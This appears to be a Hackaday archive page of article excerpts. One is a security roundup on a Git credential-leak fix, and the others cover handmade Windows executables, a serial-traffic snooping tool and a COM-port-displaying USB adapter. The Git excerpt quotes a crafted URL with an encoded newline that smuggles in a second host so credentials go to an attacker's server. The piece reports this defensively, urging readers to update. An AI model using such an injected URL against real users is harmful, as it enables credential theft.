This Week In Security: Git, Patch Tuesday, Anti-Cheat, And Vulnerable Documentation

April 17, 2020 by Jonathan Bennett 8 Comments

Git released an update on Tuesday, fixing an issue that could result in leaking credentials. The vulnerability was in how Git handles an HTTP URL containing a newline. Looking at the commits in 2.26.1, we can find an example of an attack:
url = "https://one.example.com?%0ahost=two.example.com/foo.git"

So doing a git pull against this repository will connect your git instance to an attacker’s server, but using the credentials from an arbitrary server. It seems like this could potentially be used to steal Github credentials, for instance. So go make sure you have an updated Git client.
Continue reading “This Week In Security: Git, Patch Tuesday, Anti-Cheat, And Vulnerable Documentation” →

Bespoke, Artisanal, Hand Made Executables

October 12, 2015 by Brian Benchoff 69 Comments

Programmers and software engineers will always use the latest development environments, the trendiest frameworks, and languages they learned only 21 days ago. What if this weren’t the case? What if developers put care into their craft and wrote programs with an old world charm? What if Windows executables were made with the same patience as artisanal firewood, or free range granola? [Steve] has done it. He’s forging a path into the wilds of truly hand crafted executables.

The simplest executable you could run on a Windows box is just a simple .COM file. This is an extremely simple file format that just contains code and data loaded into 0100h, and a jump to another point in the code. The DOS .EXE file format is slightly more complicated, but not by much. [Steve]’s goal was to build a proper Windows executable without a compiler, assembler, linker, or anything else.

Continue reading “Bespoke, Artisanal, Hand Made Executables” →

A Tool For Spying On Serial Data

May 6, 2015 by Rick Osgood 36 Comments

[Piotr] was working on a recent Arduino project when he ran into a problem. He was having trouble getting his Arduino Pro Mini to communicate with an ESP8266 module. He needed a way to snoop on the back and forth serial communications. Since he didn’t have a specialized tool for this task, [Piotr] ended up building his own.

The setup is pretty simple. You start with a standard serial cable containing the TX, RX, DTR, and GND wires. This cable connects the Arduino to the ESP8266 WiFi module. The TX and RX lines are then tapped into. Each wire is routed to the RX pin of two different serial to USB adapters. This way, the data being sent from the Arduino shows up on one COM port and the data being transmitted from the module shows up on the other.

The next piece of the puzzle was coming up with a way to see the data more clearly. [Piotr] could have opened two serial terminals simultaneously, but this wasn’t ideal because it would be difficult to compare the timing of the data. Instead, [Piotr] spent less than an hour writing his own simple serial terminal. This one connects to two COM ports at the same time and prints the data on the same screen. The data from each COM port is displayed in a separate color to make it easy to differentiate. The schematic and source code to this project can be found on [Piotr’s] website.

USB To Serial Adapter Tells You What COM Port You’re On

January 14, 2013 by Brian Benchoff 32 Comments

xser

Since most of us are long past the days of hardware serial ports, the USB to serial adapter has become a mainstay on the hacker’s tool belt. While they’re cheap and convenient, USB to serial adapters aren’t always the easiest thing to use: there’s always the issue of what COM port Windows is calling your USB to serial adapter, or what TTY device it is in Linux/OS X.

[Avishay] has a very, very cool solution to this problem: put a display on a USB to serial converter to tell the user what COM port the OS labeled it as.

The prototype runs on a PIC 18F2553 dev board. When plugged into a Windows box, the serial adapter sets up two USB devices. The first device is a Communications Device Class that handles the grunt work of the USB to Serial connection. The second USB device is a proprietary piece of software that grabs the current COM port number. This number is displayed on an LCD thanks to a host application on the Windows PC that reports the COM port of the Serial adapter.

It’s one of those ideas where you didn’t know you needed it until it was presented to you. An excellent tool from [Avishay], although maybe a pair of 7-segment LEDs would make it a more manufacturable device.